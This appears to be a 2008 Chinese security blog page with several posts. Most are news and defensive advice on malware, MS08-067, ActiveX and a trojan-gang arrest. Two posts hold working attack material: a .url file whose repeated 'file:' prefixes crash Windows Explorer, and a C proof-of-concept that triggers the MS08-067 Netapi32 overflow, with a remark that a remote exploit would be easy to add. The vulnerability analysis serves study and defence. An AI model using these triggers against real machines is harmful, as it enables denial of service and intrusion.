.text:7D6A116D push eax
.text:7D6A116E push edi
.text:7D6A116F mov [ebp+var_20A0], 824h
.text:7D6A1179 mov [ebp+var_209C], 823h
.text:7D6A1183 call ds:UrlGetPartW(x,x,x,x,x)
.text:7D6A1189 test eax, eax
.text:7D6A118B jl short loc_7D6A11A1
.text:7D6A118B
.text:7D6A118D cmp [ebp+var_209C], 0
.text:7D6A1194 jz short loc_7D6A11A1
.text:7D6A1194
.text:7D6A1196 mov word ptr [ebp+var_104C], 3Fh
.text:7D6A119F jmp short loc_7D6A11A9
.text:7D6A119F
.text:7D6A11A1 ; ---------------------------------------------------------------------------
.text:7D6A11A1
.text:7D6A11A1 loc_7D6A11A1: ; CODE XREF: CFileUrlStub::ParseDisplayName(HWND__ *,IBindCtx *,ushort *,ulong *,_ITEMIDLIST * *,ulong *)+5Fj
.text:7D6A11A1 ; CFileUrlStub::ParseDisplayName(HWND__ *,IBindCtx *,ushort *,ulong *,_ITEMIDLIST * *,ulong *)+68j
.text:7D6A11A1 and word ptr [ebp+var_104C], 0
.text:7D6A11A1
.text:7D6A11A9
.text:7D6A11A9 loc_7D6A11A9: ; CODE XREF: CFileUrlStub::ParseDisplayName(HWND__ *,IBindCtx *,ushort *,ulong *,_ITEMIDLIST * *,ulong *)+73j
.text:7D6A11A9 push 0
.text:7D6A11AB lea eax, [ebp+var_20A0]
.text:7D6A11B1 push eax
.text:7D6A11B2 lea eax, [ebp+Srch]
.text:7D6A11B8 push eax
.text:7D6A11B9 push edi
.text:7D6A11BA call ds:PathCreateFromUrlW(x,x,x,x) 该函数递归
.text:7D6A11C0 test eax, eax
.text:7D6A11C2 jl short loc_7D6A121B
.text:7D6A11C2
.text:7D6A11C4 push ebx ; int
.text:7D6A11C5 push esi ; int
.text:7D6A11C6 xor edi, edi
.text:7D6A11C8 push edi ; char
.text:7D6A11C9 push edi ; int
.text:7D6A11CA lea eax, [ebp+Srch]
.text:7D6A11D0 push eax ; lpSrch
.text:7D6A11D1 call ILCreateFromPathEx(x,x,x,x,x)
　　总结:
　　由于对参数检查不严格，造成这段函数不停地递规调用自已，每次都用堆栈0x20A0。由于windows线程的堆栈不是无限增大的，超过他的最大范围就出错了。当进行第28次调用以后，达到了windows堆栈所能允许的最大值，explorer程序异常退出。
　　3.利用代码　
[InternetShortcut]
　　url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:
　　把以上文字保成成URL为后缀的文件，可以造成桌面程序(Expolore.exe)一直出错。

微软：ActiveX漏洞威胁Vista安全

gtzwj — 2008-11-07 09:34

Hackost's Blog ( http://gtzwj.cn/ ) :

虽然Vista相比XP更不容易受到恶意代码的攻击，但是Vista仍然一直受到自身ActiveX浏览器插件技术的潜在威胁。本周一，微软发布了这方面的相关报道。

微软每年都会透过Security Intelligence Report (SIR)分享两次其研究报告，在这份报告中，微软表示安装有XP Service Pack2(SP2)的电脑相比Vista SP1而言，被恶意软件感染的几率超过3倍。而最新的XP，也就是SP3，被感染的可能性则为SP1的两倍。

“我们为安全所做的工作正获到回报，”微软产品安全和安全工程集团总经理George Stathakopoulos表示，该安全工程集团一直致力于为新产品编写更安全的代码，包括Vista。“我们很高兴为我们所取得的成就，但是从整个系统范围来说，我们还面临着问题”。

在过去6个月时间内，基于浏览器攻击Windows XP的前十位排名中，有一半以上是由于微软自身的软件存在漏洞，而在这前十位排名中，没有针对Vista系统的攻击。相反，绝大多数通过浏览器攻击Vista的都是通过第三方ActiveX控制实现。

ActiveX中是微软用来为IE创建插件的技术，在今年上半年基于浏览器攻击Vista的前十位排名中，有八个是由该漏洞引起。而第九个攻击则可以通过ActiveX其他漏洞手段获得实现。

ActiveX影响到的八个漏洞中有两个漏洞涉及到RealPlayer媒体播放器插件，另外一个则涉及到苹果的QuickTime 播放器。这两家公司在今年都已经发布了安全补丁。苹果还在2008的五次更新中，发布了近30个QuickTime漏洞补丁。

在2007年下半年，ActiveX漏洞在所发现的浏览器插件漏洞中，曾占据了79%的份额。

特别是在中国，在今年上半年基于浏览器攻击中，国内用户占据整个受害者的47%，微软表示。Stathakopoulos还指责中国开发者在ActiveX问题上过于草率，“我认为这些开发者缺少良好的安全意识，尤其是相对于中国这么大的市场来说。”。这也就是为什么中国受到浏览器攻击特别严重的原因，他解释道。

而美国用户在基于浏览器漏洞攻击的受害者中，只占据了23%。

Stathakopoulos说，微软正在为帮助开发者编写更安全的代码而付出更多努力。在9月，微软组建了由九家安全咨询公司组成的一个付费计划“SDL Pro Network”。另外，微软也将于本月份允许用户免费下载其SDL优化模式和SDL威胁模式工具3.0，以帮助开发人员完成SDL。

他还强调，微软对IE中的ActiveX进行锁定的努力获得预期效果。比如，IE7中很多ActiveX默认都是被禁止的，如果要开启的话，需要征求用户明确的意见。同时，还处在测试中版中的IE8，也引入了更多的安全特性，包括限制特殊域的访问——比如企业内部网。

“扫荡波”来袭已造成大面积用户系统崩溃

gtzwj — 2008-11-07 09:33

Hackost's Blog ( http://gtzwj.cn/ ) :

微软“黑屏”后遗症已初步爆发!许多网友正在庆幸躲过了“黑屏”，却没想到自己已因此而沦为了“肉鸡”。

　　最近一段时间，为了避免下载微软的黑屏补丁，许多网友关闭了系统自动更新，从而给了黑客们利用系统漏洞作恶的机会。360安全中心近日发现，网上最近忽然冒出来“狼牙全自动抓鸡器”等多款恶意工具，并在迅速流传之中。据分析，这类“狼牙抓鸡器”每天可以控制上万台普通用户电脑，将其变为黑客手中任人宰割的“肉鸡”。更可怕的是，中招电脑就象《黑客帝国》中那些被史密斯特工传染的人物一样，马上变成又一个史密斯特工，转身就开始主动攻击局域网内的其它电脑。

　　据360安全专家介绍，任何人一旦得到“狼牙抓鸡器”这类工具，都可通过这些工具对指定IP段进行扫描，一旦发现没有更新KB958644补丁的联网电脑，填入木马下载地址后便能发起远程攻击，无论你的电脑是否设置系统密码或安装杀毒软件，都只能任由对方远程控制，成为任由他人摆布的“肉鸡”。某黑客组织甚至声称，“扫描一天一夜即可抓取上万只‘肉鸡’”!　　

　　据了解，这是黑客利用微软最新RPC漏洞MS08-067实施的“扫荡波”蠕虫攻击，用户如尚未给系统打好KB958644补丁，一旦被黑客扫描发现，瞬间便受到蠕虫病毒侵袭，成为被黑客远程控制的帮凶，主动去攻击其他用户的电脑。也就是说，局域网中一旦有一台电脑中招，全网没有修复漏洞的电脑就都会感染病毒，其危害和传播形式与猖獗一时的“冲击波”、“震荡波”非常相似。

　　一些已中招的网友在360百科(bk.360.cn)中求助，他们反映：受到“扫荡波”攻击的系统会出现“svchost.exe应用程序错误”提示，无论点击“确定”还是“取消”按钮，系统或断网、或崩溃，如电脑桌面显示为乱码、程序无响应、无法打开任务管理器，各种症状层出不穷，使用任何杀毒软件均无济于事，即使重装系统也不能解决问题，除了修复系统之外再无药可救。如果您的电脑出现这样的情况，那很可能已经沦为黑客的“肉鸡”。　　

　　据360安全专家分析，黑客们之所以能抓取这么多“肉鸡”，与大量用户为避免黑屏而关闭系统自动更新有关。这些用户在关闭自动更新后，没有及时采用360安全卫士等第三方工具来打补丁修复系统漏洞，从而给了“狼牙抓鸡器”以可乘之机。

　　国内著名软件下载站天空软件站前不久举行了一次调查，名为“为了拒绝黑屏很多人关闭了自动更新而采用第三方补丁更新软件，你呢?”，共有22075名网友参与了投票。结果显示：仅8%的用户继续开启“自动更新”，另有64.4%的用户，也就是三分之二的网民选择了使用360安全卫士打补丁。尽管如此，仍有许多网友缺乏安全意识，或因担心被黑屏而没有及时修复系统漏洞，反而使自己成为“抓鸡工具”的牺牲品。　　

　　图片说明：天空软件站调查结果(页面链接：http://news.skycn.com/article/17729.html)
　　为此，360安全专家强烈建议广大网友，尽快使用360安全卫士等第三方工具下载系统补丁，及时修复系统漏洞!360安全卫士只为用户提供那些真正必要安装的安全类补丁，因而网友可以放心下载。已受到“扫荡波”蠕虫攻击的用户，除尽快用360安全卫士下载补丁外，还需下载最新版的360顽固木马专杀大全，断开网络后进行查杀。(下载地址：http://www.360.cn/killer/360compkill.html)。如果网友发现电脑出现任何问题，都可以前往360求助中心进行咨询：http://baike.360.cn/help.html，360安全专家将为用户在线提供帮助。

牛X的90后女生

gtzwj — 2008-11-05 08:50

Hackost's Blog ( http://gtzwj.cn/ ) :

病毒命名方法的完全解密

gtzwj — 2008-11-05 08:45

Hackost's Blog ( http://gtzwj.cn/ ) :

各类病毒层出不穷，在我们碰到一个新的病毒时应该如何判断出病毒的类型、危害和特点呢？其实，这一切在命名病毒时就已经体现出来了。在国际上通用的一个病毒完整的名称是由三部分组成的，即“前缀+病毒名+后缀”。

　　一、认识前缀

　　前缀的作用主要有两个，表示病毒发作的操作平台或病毒的类型。例如DOSCom.Virus.2041就表示该病毒只有在DOS平台下才会发作。又如Trojan.Win32.PGPCoder.a则表示是该病毒的是一个运行在32位Windows系统下的特洛伊病毒。

　　常见的病毒类型有Boot——引导区病毒、Worm(I-WOrd)——蠕虫病毒、Backdoor——后门程序、Macro——宏病毒、Script(VBS/JS)——脚本病毒、PSW——窃取密码的木马、Joke——恶作剧程序、Harm——恶意程序等。

　　从前缀上我们可以判断出它的危害性和是否对自己的平台造成影响。

　　二、病毒名

　　病毒名主要是根据病毒的一些特殊来命中的。通常会从四个方法进行考虑。

　　发作时间

　　主要根据病毒发表时的时间来命名，例如黑色星期五，因为它发作是处于某月的13日，并且是星期五时才会发作。这样我们碰到这样的日子就要加以注意了。

　　发作症状

　　很多病毒发作时都会有一定的外部表现，例如“火炬”病毒发作时会在屏幕上出现闪烁的火炬图案。掌握常见病毒的发作表现，可以在中招后迅速采取正确的处理方法。

　　病毒标志

　　有一些病毒作者会让病毒发作时显示一些特殊的字符，这些字符往往也会被作为病毒的名称。其次病毒的标识、存放位置等都有可能成为病毒的命名方法。

　　发现地点

　　有一些病毒的命名还是根据其首先发现的地点来进行的。例如Vienna就是首先在维也纳发现的。

　　其实，按病毒的字节长命等方法进行命名也是比较常见的。综合上面的方法，经常会出现同一个病毒有多个别名。例如CIP病毒又名“切尔诺贝利病毒”，因为这是1986年苏联切尔诺贝利核泄露纪念日。

　　三、后缀

　　开始至bz结束，依次类推。

　　从上面可以看出，了解病毒名称的常见前缀和病毒名的含义，将有助于我们在病毒发作时，迅速了解其危害，快速作出正确的处理方法。

解决无法删除的文件常见方法

gtzwj — 2008-11-05 08:39

Hackost's Blog ( http://gtzwj.cn/ ) :

当我们试图将一些无用的文件删除时，却常常并不如愿所偿。无法删除的文件的原因有很多，下面我们就向大家介绍常见的解决方法。

　　一、文件调用

　　被删除的文件正在被调用，这是无法删除中碰到最多的。如果是该文件正在打开或运行，那么直接将其关闭即可。除此之外，该文件并没有在前台运行，而是被其它一些程序在后台调用，这个时候我们就可以借助Who Lock Me。安装该软件后右击该要删除的文件，选择“Who Lock Me”即可查看调用的主文件，将主文件关闭后再进行删除即可。

　　二、媒体文件无法删除

　　在Windows XP中，我们在删除一些AVI文件时也经常会提示无法删除，这是因为系统有一个预读缓存机制功能所产生的。对此我们可以直接将该功能取消，只要在运行中输入“Regsvr32 /U Shmedia .dll”即可。或者运行“Regedit”打开注册表，将“HKEY_LOCAL_MACHINE/SOFTWARE/Classes/CLSID/{87D62D94-71B3-4b9a- 9489-5FE6850DC73E}/InProcServer32”键值删除即可。

　　三、借助WinRAR

　　当文件无法删除时我们不防借助WinRAR来解决。选中该文件并右击，选择“添加到压缩文件”，然后在弹出的压缩参数设置窗口中选中“压缩后删除源文件”，最后再将生成的压缩包删除即可。

　　四、通用办法

　　上面介绍的只是一些具体的办法。其实碰到文件无法删除时我们还可以试试下面的一些通用方法：

　　（1）注销或重启计算机，然后不进行任何操作就进行文件删除；

　　（2）启动时选择F8进入安全模式删除；

　　（3）在DOS模式下使用Del命令删除；

　　（4）在任务管理器中结束Explorer.exe进程，再运行“cmd”在命令提示符中用del命令删除；

　　（5）系统文件可以采用多系统或将硬盘作为从盘接到其它电脑上删除。

　　当你再碰到文件无法删除时，不防试试上面的方法，一定可以让你轻松的删除。

福建:拟立法规定盗QQ号最高可罚款3万元

gtzwj — 2008-11-05 08:34

Hackost's Blog ( http://gtzwj.cn/ ) :

不少读者认为,当前窃用他人QQ号、邮箱账号,公开他人邮箱号用以牟利等现象较为普遍,对互联网用户的利益造成损害,而《福建省计算机信息系统网络安全管理条例》已列入福建省立法规划,建议条例中对这些行为有惩罚性的条款.彭超等福建省人大代表在今年初的全省两会上提出《关于尽快出台〈福建省计算机信息系统安全保护条例〉的议案》的建议,对此,省人大常委会表示福建省将启动这方面的立法,如何制止目前常见的盗取他人网上账号、攻击网络等不法行为,在今后立法中将统筹考虑.

彭超代表认为,窃用QQ号、邮箱账号,让受害者叫苦不迭;故意制作、传播恶意软件等行为,危害计算机信息系统运行功能发挥,也让人们深恶痛绝.对此,福建省在地方立法中应特别规定处罚办法,如果没有违法所得的处以1万元以下罚款;如果有违法所得的,处以不超过违法所得3倍的罚款,最高不得超过3万元.

福建省法律界人士认为,目前《物权法》对QQ号、邮箱账号这类虚拟财产的属性并没有作出明确规定,所以在司法实践中,除非是对那些涉案金额大的盗取他人QQ号的行为,提起公诉;而对于那些涉案金额小,甚至无涉案金额的窃用他人QQ号的行为,是否该予以处罚,存在较大争议,这在地方立法中应有所突破.

据悉,广东省已规定,擅自向第三方公开他人电子邮箱地址和其他个人信息资料,窃取他人账号和密码,或者擅自向第三方公开他人账号和密码,假冒他人名义发送信息,故意制作、传播恶意软件等破坏性程序等,公安机关可处以警告,有违法所得的,没收违法所得;对个人可以并处5000元以下罚款,对单位可以并处1.5万以下罚款;情节严重的,并可以给予6个月以内停止联网、停机整顿的处罚.彭超建议,福建省在地方立法中,可以借鉴外省的经验.

全国首例木马病毒案逮捕20多人

gtzwj — 2008-11-05 08:32

Hackost's Blog ( http://gtzwj.cn/ ) :

2008年7月中旬,经过4个多月的缜密侦查,盛名一时的“伯乐”木马制造者吉才在深圳被江苏扬州警方抓获.这一团伙苦心经营一年多的庞大“帝国”瞬间轰然倒塌,20多名主要犯罪嫌疑人落入法网.

　　“伯乐”不识马专门养“木马” 价值8000元“宝刀”被盗

　　今年4月初,网民小秋玩电脑游戏时,屏幕上突然跳出一个窗口,称点击下载该程序后,可以提高游戏运行速度,小秋丝毫没有犹豫,点了下去.

　　然而,时隔10分钟左右,许多莫名网站陆续弹出,且无法关掉,小秋估计可能中毒了,随即关闭电脑.可当他再次打开自己的游戏账号时,意外发生了:身上的装备全都蒸发,一把价值8000元的宝刀,也没有了踪影.

　　玩过网上游戏的人都知道,电脑游戏里的装备虽然是虚拟的,但都可以通过现金来确定价格并交易,小秋认为这是别人采取了非法的手段盗取了自己的游戏装备,便立即报警.

　　此时扬州市公安局网警支队十分忙碌.近期,通过互联网的报警处理平台每天接受这类游戏装备被盗案件十几起.

　　经查证,警方判断,这很可能是一种叫“伯乐”的木马病毒所为.

　　循着“蹄印”找到“养马人”

　　警方决定以此为突破口.在扬州市公安局网警支队里,数十台电脑前,民警查访各大游戏网站和论坛,通过对数万信息的筛选、研判,终于找到“马蹄印迹”,一个自称该款病毒制造者的人进入警方视线,他的网名就叫“伯乐”.

　　7月8日,“捉马行动”全面展开.

　　当天上午,扬州火车站候车大厅内人来人往,喧闹嘈杂.一对年轻的夫妻正有说有笑地等待火车进站.“你好'伯乐',我们是警察,请跟我们走一趟.”年轻人周围突然出现一队警察,大厅内一阵骚动,随即沉静下来.妻子木然站立不知所措,男子知道事已败露,低声对警察说:“我跟你们走,只是请留点面子.”警察听出话外之音,未给他上手铐,只是警惕地站在他身边.男子神色黯然地牵着妻子的手,随警察离去.

　　在广陵公安分局,“伯乐”交代,木马程序的制作、销售是一个分工明确的组织,而他仅仅负责网上销售.所有的病毒程序都是一个叫“大哥”的男子提供的,由于只是网上交易,“大哥”姓什么,长什么样子一概不知.

　　在浙江发现病毒源代码

　　查看“伯乐”与“大哥”交谈记录,民警发现“大哥”来自浙江台州,且未察觉到“伯乐”已经落入警方之手.7月9日,也就是“伯乐”落网的第二天,抓捕小分队出现在台州某小区.

　　“你好,请开门,我们是小区物管.”民警按下门铃后大声说道.门打开一条缝,民警推门而入,将毫无准备的“大哥”抓获.民警环视左右,发现“大哥”的屋内装潢豪华,但却并不像一个制造病毒的工作室.疑惑之际,另一民警看出猫腻,此房是楼中楼,且经过伪装需从外楼梯才能到达顶楼.打开楼上大门,场景令人震惊,10多台台式电脑、笔记本电脑、服务器交错排开,4名工作人员正在检测新编写的“伯乐”木马病毒.

　　在“大哥”的保险箱里,民警又有重大发现,这里不仅摆放了130多万元的存单,还有一个精致的移动硬盘.大哥交代,硬盘中存储的正是“伯乐”木马的源代码.就在民警欢欣鼓舞,认为已将这个团伙连根拔起的时候,一个令大家意想不到的结果出现了,“ 大哥”交代“伯乐”木马的编写者并不是他,而是另有其人,名叫吉才,居住在深圳.

　　7月14日,吉才独自一人用餐,当他走出餐厅时,等候已久的民警将他带上车.经吉才交代,他确是伯乐木马病毒的始作俑者.吉才也成为全国首个被抓获的木马病毒制造者.

　　拔出萝卜带出泥,随后警方又马不停蹄上北京,下广州等地,行程数万公里,抓获涉案嫌疑人20多名,缴获赃款200多万元.
　　
　　“病毒之父”只有初中文化

　　白白净净、年轻、头发微鬈,这是吉才留给人的第一印象,然而这个帅气的青年却是叱咤网络的“伯乐木马”的始作俑者.

　　吉才是湖南郴州人.据吉才说,初中时他的成绩在班上排名中游,毕业后就外出打工.2000年左右,吉才来到郴州电脑城,第一次接触到电脑和网络,并被深深吸引.面对神奇的电脑,吉才突然来了学习兴趣,在初中文化的基础上,自学英语和数学,并开始学习编写小程序.

　　兴趣是最好的老师,扎进电脑知识的海洋,吉才如饥似渴,从早上起床到次日凌晨,他就像被粘在了电脑前的椅子上,动也不动.不久,吉才编写的WINDOWS操作系统维护程序诞生了,并由此引得郴州电脑、网络同行们的关注.

　　2002年吉才来到深圳谋求进一步发展,并在某电脑公司从事编程工作,编程技术日益精进.行业内的人,经常找到吉才编写程序及相关模块.2007年,吉才通过熟人介绍认识了“大哥”.此时,在网络里混了多年的“大哥”看准一个“商机”,即通过木马程序盗取游戏者的装备,再转卖给游戏者,以获取巨额利益.正需要金钱的吉才与“大哥”一拍即合.

　　据吉才交代,他负责编写、维护并升级木马程序,每月可从“大哥”处获得4万元的收入.编写一个木马病毒收益如此之大,财富从何而来?随着对涉案当事人审查的深入,一个庞大的黑色产业链条呈现在民警面前.

　　盗号黑色产业链浮出水面

　　要说清这个产业链并非易事,因为其结构过于庞杂,犹如一个树形结构,在主干上生出许多枝干,枝干上又长出许多枝丫.这里,我们以主干为表述核心进行解析.

　　如果把主干形容成一个公司,那么“大哥”就是公司老板;吉才是技术总监,负责产品制造与升级;“伯乐”是销售总监.

　　买主是那些专门从事盗号的人.每款木马的价格在4000元左右.如果买主要求单独为其制作一个木马,需要支付30000元左右的费用.另外,木马要不断升级以避免杀毒软件查杀,买家还得另外支付升级费用.

　　这些买主大多为盗号者,他们通过“流量商”将木马病毒植入他人的计算机内.由于“流量商”与许多网站都十分熟悉,并有业务往来,他们将已伪装成广告等形式的木马病毒,放到点击率较高的网站主网上,当你点击到那些弹出窗口时,木马病毒就“种”到了你的计算机上.

　　“流量商”按每次点击1角钱的价格,回报网站.据涉案人员交代,由于全国网民人数众多,他们每天能种10万多个“马”,为此也要支付万余元的费用.

　　“伯乐”交代,网友中毒后,当启动游戏时,自己的账号与密码就会自动出现在盗号者的眼前.面对如雪片般飞来的信息,盗号团伙一方面使用被盗网民的用户名密码登录游戏,清洗玩家的游戏币、装备等虚拟财产,然后通过专门的网络再在网上销售,从中赚取利润.

　　来不及处理的,就干脆再倒卖信件.据涉案人员交代,2007年12月以来就通过传播“伯乐”等有害程序,盗窃游戏账号2000万余封,非法获利数百万元.

病毒监测周报 2008.10.26-2008.11.1

gtzwj — 2008-11-05 08:31

Hackost's Blog ( http://gtzwj.cn/ ) :

一、病毒疫情周报表
计算机病毒疫情监测周报
序号病毒名称
病毒特点
1
“木马下载者”(Trojan_Downloader)及变种
该木马通过网联网或是网页挂马的方式进行传播感染,并且它会自动连接互联网络中的指定服务器，下载大量病毒、木马等恶意程序，导致计算机用户系统中的重要数据信息失密窃。
2 “网游大盗”（Trojan_PSW.OnlineGames）及变种
它是一个盗号木马程序，专门盗取网络游戏玩家的游戏帐号、游戏密码、装备信息、角色等级、仓库密码、金钱数量、游戏区服等信息资料，并将这些机密信息资料在被感染计算机的后台发送到骇客指定的远程服务器站点中或邮箱里。
3 “网络天空”变种(Worm_Netsky.D)
该病毒通过邮件传播，使用UPX压缩。运行后，在%Windows％目录下生成自身的拷贝，名称为Winlogon.exe。（其中，%Windows% 是Windows的默认文件夹，通常是 C:\Windows 或 C:\WINNT），病毒使用Word的图标，并在共享文件夹中生成自身拷贝。病毒创建注册表项，使得自身能够在系统启动时自动运行。病毒邮件的发信人、主题、内容和附件都是不固定的，附件为一个.pif文件。当病毒运行时，会生成病毒文件、修改和删除注册表项。
4 Worm_Mytob.X
该病毒是Worm_Mytob变种，并利用自身的SMTP引擎按照邮件地址列表中的邮件地址向外发送病毒邮件。该病毒还可以通过网络的共享文件夹进行搜索并尝试在这些文件夹中产生自身的拷贝文件。还具有后门功能，会使用不同的端口连接到指定的服务器上面，该服务器监听来自远程恶意用户的指令，利用这个指令远程用户可以控制受感染机器。同时，该变种利用一个任意的端口建立一个 FTP服务器，远程用户可以下载或上传文件或是恶意程序。该病毒是常驻内存的蠕虫病毒，利用RPC DCOM 缓冲区溢出漏洞、IIS5/WEBDAV 缓冲区溢出漏洞和RPC Locator 漏洞进行传播，还可通过弱密码攻击远程系统进行主动传播以及利用mIRC软件进行远程控制和传播。病毒运行后，在%System％文件夹下生成自身的拷贝nvchip4.exe。添加注册表项，使得自身能够在系统启动时自动运行。
二、本周病毒动态分析
通过对以上监测结果分析，本周上榜的病毒排位情况基本没有变化，也没有出现新的重大病毒疫情，还是一些常见的流行病毒，因此用户还需加强对这些病毒的防范和清除工作。

本月微软公司发布的多个系统漏洞补丁程序中MS08-067值得广大重点企、事业单位的计算机用户关注。恶意攻击者很有可能会利用该漏洞发起远程攻击，在受攻击的操作系统中任意执行恶意代码操作，致使操作系统面临崩溃的威胁。
近日，大量盗版用户为了躲避微软的正版验证，关闭了系统自动更新功能，这无疑给恶意攻击者利用MS08-067漏洞进行攻击提供了可乘之机。
三、建议可以采用以下病毒防范措施：
1、建议广大重点企事业单位的计算机用户不可以忽视这个漏洞，大家要尽快地下载安装补丁程序，防止利用此漏洞进行恶意攻击现象的发生。下载地址： http://www.microsoft.com/china/technet/security/bulletin/ MS08-067.mspx
2、网站管理者要加强网站的监督管理，定期对上传的Web网页文件进行比对，包括文件的创建、更新时间，文件大小等，及时发现异常的Web网页文件。一旦发现异常文件，应立即删除并更新。定期维护升级网站服务器，检查服务器所存在的漏洞和安全隐患。
3、对于重点网站，尤其是政府网站和各大媒体网站，很有可能被利用现有的漏洞进行挂马，或跳转到其他恶意网站。我们应急中心采取了相应措施，建立了对重点网站的巡查机制，以便于及时发现问题。
4、及时下载安装操作系统和系统中应用软件的漏洞补丁程序，阻止各类病毒、木马等恶意程序入侵操作系统。
5、计算机用户在Web网页时，务必打开计算机系统中防病毒软件的“网页监控”功能。同时，计算机用户应及时下载安装操作系统已安装应用软件的最新漏洞补丁或新版本，防止恶意木马利用漏洞进行入侵感染操作系统。
6、不要轻易打开来历不明的邮件，尤其是邮件的附件；不要随便登录不明网站。
7、使用U盘、软盘进行数据交换前，先对其进行病毒检查。
8、做好系统和重要数据的备份，以便能够在遭受病毒侵害后及时恢复。
9、发现网络和系统异常，及时与国家计算机病毒应急处理中心或防病毒厂家联系。　

MS08-067漏洞分析

gtzwj — 2008-10-27 09:48

Hackost's Blog ( http://gtzwj.cn/ ) :

前天看到微软紧急发布了一个漏洞补丁，就去看了下，发现该漏洞影响覆盖面非常广，
包括Windows 2000/XP/2003/Vista/2008的各个版本，甚至还包括测试阶段的Windows 7 Pre-Beta，并且漏洞存在于Windows系统默认开启的Server服务当中，而且超越了当年风靡一时的MS06-040
漏洞（又想起当年用该漏洞。。。。。。。嘿嘿）。这也难怪微软打破周二发布补丁的惯例
于是下了补丁研究研究。

下完补丁，发现被打补丁的又是 Netapi32.dll，对比原文件和补丁中的文件，有问题的函数又是
NetpwPathCanonicalize（MS06-040也是这个函数，具体信息请搜索）简单说下这个函数：
该函数用于标准化一个路径，一般用于本地调用，若调用者指定了一个远程计算机名将会使用RPC。

该函数能够处理的路径类型:
1.相对路径 e.g. foo\bar
2.绝对路径 e.g. \foo\bar
3.UNC 路径 e.g. \\computer\share\foo
4.全路径 e.g. d:\foo\bar

该函数声明如下：
DWORD
NetpwPathCanonicalize(
LPWSTR PathName, //需要标准化的路径
LPWSTR Outbuf, //存储标准化后的路径的Buffer
DWORD OutbufLen, //Buffer长度
LPWSTR Prefix, //可选参数，当PathName是相对路径时有用
LPDWORD PathType, //存储路径类型
DWORD Flags // 保留，为0
)

该函数中在一个循环里使用wcscpy，恶意攻击者通过构造一个精心设计的路径将使漏洞触发。

结合IDA分析该函数：(F5 + 整理 + 主要代码)

int __stdcall NetpwPathCanonicalize(LPWSTR PathName, LPWSTR Outbuf, DWORD OutbufLen, LPWSTR Prefix, LPDWORD PathType, DWORD Flags)
{
bool v7;
int result;

v7 = !Prefix || !*Prefix;
Prefix = (LPWSTR)*PathType;

if ( *PathType || (result = NetpwPathType(PathName, (int)&Prefix, 0), !result) )
{
if ( v7 || (result = NetpwPathType(Prefix, (int)&Flags, 0), !result) )
{
if ( OutbufLen != 0 )
{
*Outbuf = 0;
result = CanonPathName(Prefix, PathName, Outbuf, OutbufLen, 0); //核心函数，主要处理在这里，问题也出在这里
if ( !result )
result = NetpwPathType(Outbuf, (int)PathType, 0);
}
else
{
result = 2123;
}
}
}

return result;
}

int __stdcall CanonPathName(LPWSTR PathPrefix, LPWSTR PathName, LPWSTR Buffer, DWORD BufferSize, LPDWORD RetSize)
{
size_t preLen;
size_t pathLen;
wchar_t pathBuffer[MAX_PATH*2 + 1];

if ( PathPrefix && *PathPrefix )
{
preLen = wcslen(PathPrefix);
if ( preLen != 0)
{
if ( preLen > 520 ) //520 = sizeof(pathBuffer) - 1
return 0x7Bu; // ERROR_INVALID_NAME

wcscpy(pathBuffer, PathPrefix);

if ( pathBuffer[preLen-1] != '\\' && pathBuffer[preLen-1] != '/') //判断前缀是否以'\'或'/'结尾
{
wcscat(pathBuffer, L"\\");
++preLen;
}
if ( PathName[0] == '\\' || PathName[0] == '/' )
++pathLen;
}
}
else
{
pathBuffer[0] = 0;
}
pathLen = wcslen(PathName);

if (pathLen + preLen > sizeof(pathBuffer) - 1)
return 0x7Bu; // ERROR_INVALID_NAME

wcscat(pathBuffer, PathName);

if ( pathBuffer )
{
do //该循环把路径中的'/'转换成'\'
{
if ( *pathBuffer == '/' )
*pathBuffer = '\\';
++pathBuffer;
}
while ( *pathBuffer );
}
if ( !sub_71C4A2CA() && !ConPathMacros(pathBuffer) ) //ConPathMacros中存在缓冲区溢出漏洞！！！
return 0x7Bu;
pathLen = 2 * wcslen(&pathBuffer) + 2;
if ( pathLen > BufferSize )
{
if ( RetSize )
*RetSize = pathLen;
result = 0x84Bu;
}
else
{
wcscpy(Buffer, &pathBuffer);
result = 0;
}
return result;
}

函数ConPathMacros在附件中可以找到。
在测试时大家可以把函数ConPathMacros单独提取出来，传入一个路径，看其是怎样
去掉路径中的\..和\.宏

溢出 Netapi32.dll：
int main(int argc, char* argv[])
{
WCHAR szBuffer[] = L".\\\\x\\..\\..\\aaaaaaaaaaaaaaaaaaaaaaaaaaaa";

//ConvertPathMacros(szBuffer);
//printf("%S\n", szBuffer);

HMODULE h = LoadLibrary("netapi32.dll");
if(h != NULL)
{
NetpwPathCanonicalize = (pNetpwPathCanonicalize)GetProcAddress(h, "NetpwPathCanonicalize");
if(NetpwPathCanonicalize != NULL)
{
WCHAR Buffer[256] = L"";
DWORD type = 1;
DWORD ret = NetpwPathCanonicalize(szBuffer, Buffer, 512, NULL, &type, 0);
printf("ret = %x\n", ret);
printf("%S\n", Buffer);
}
FreeLibrary(h);
}
return 0;
}

漏洞的源头找到了，加个shellcode写个Remote Exploit不难。。。况且可以参考 MS06-040,

手工实现RPC通信等等。。。

Bulletin:
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspx

Hackost's Blog

买本本了！

政府网被黑领导变暴露女

QQ终于申诉回来了！

JCP座谈：社区需要更多的开放性和更容易的参与性

常用的Linux网络安全工具简介

linux 学习笔记 （一）

拦门四斧 砍清系统中各类型木马

伯乐木马被警方查封，“伯乐”被逮捕

TND,郁闷的一天...

个人电脑中毒紧急处理措施大杂烩

解析URL格式化漏洞

微软：ActiveX漏洞威胁Vista安全

“扫荡波”来袭 已造成大面积用户系统崩溃

牛X的90后女生

病毒命名方法的完全解密

解决无法删除的文件常见方法

福建:拟立法规定盗QQ号最高可罚款3万元

全国首例木马病毒案 逮捕20多人

病毒监测周报 2008.10.26-2008.11.1

MS08-067漏洞分析

linux 学习笔记（一）

拦门四斧砍清系统中各类型木马

“扫荡波”来袭已造成大面积用户系统崩溃

全国首例木马病毒案逮捕20多人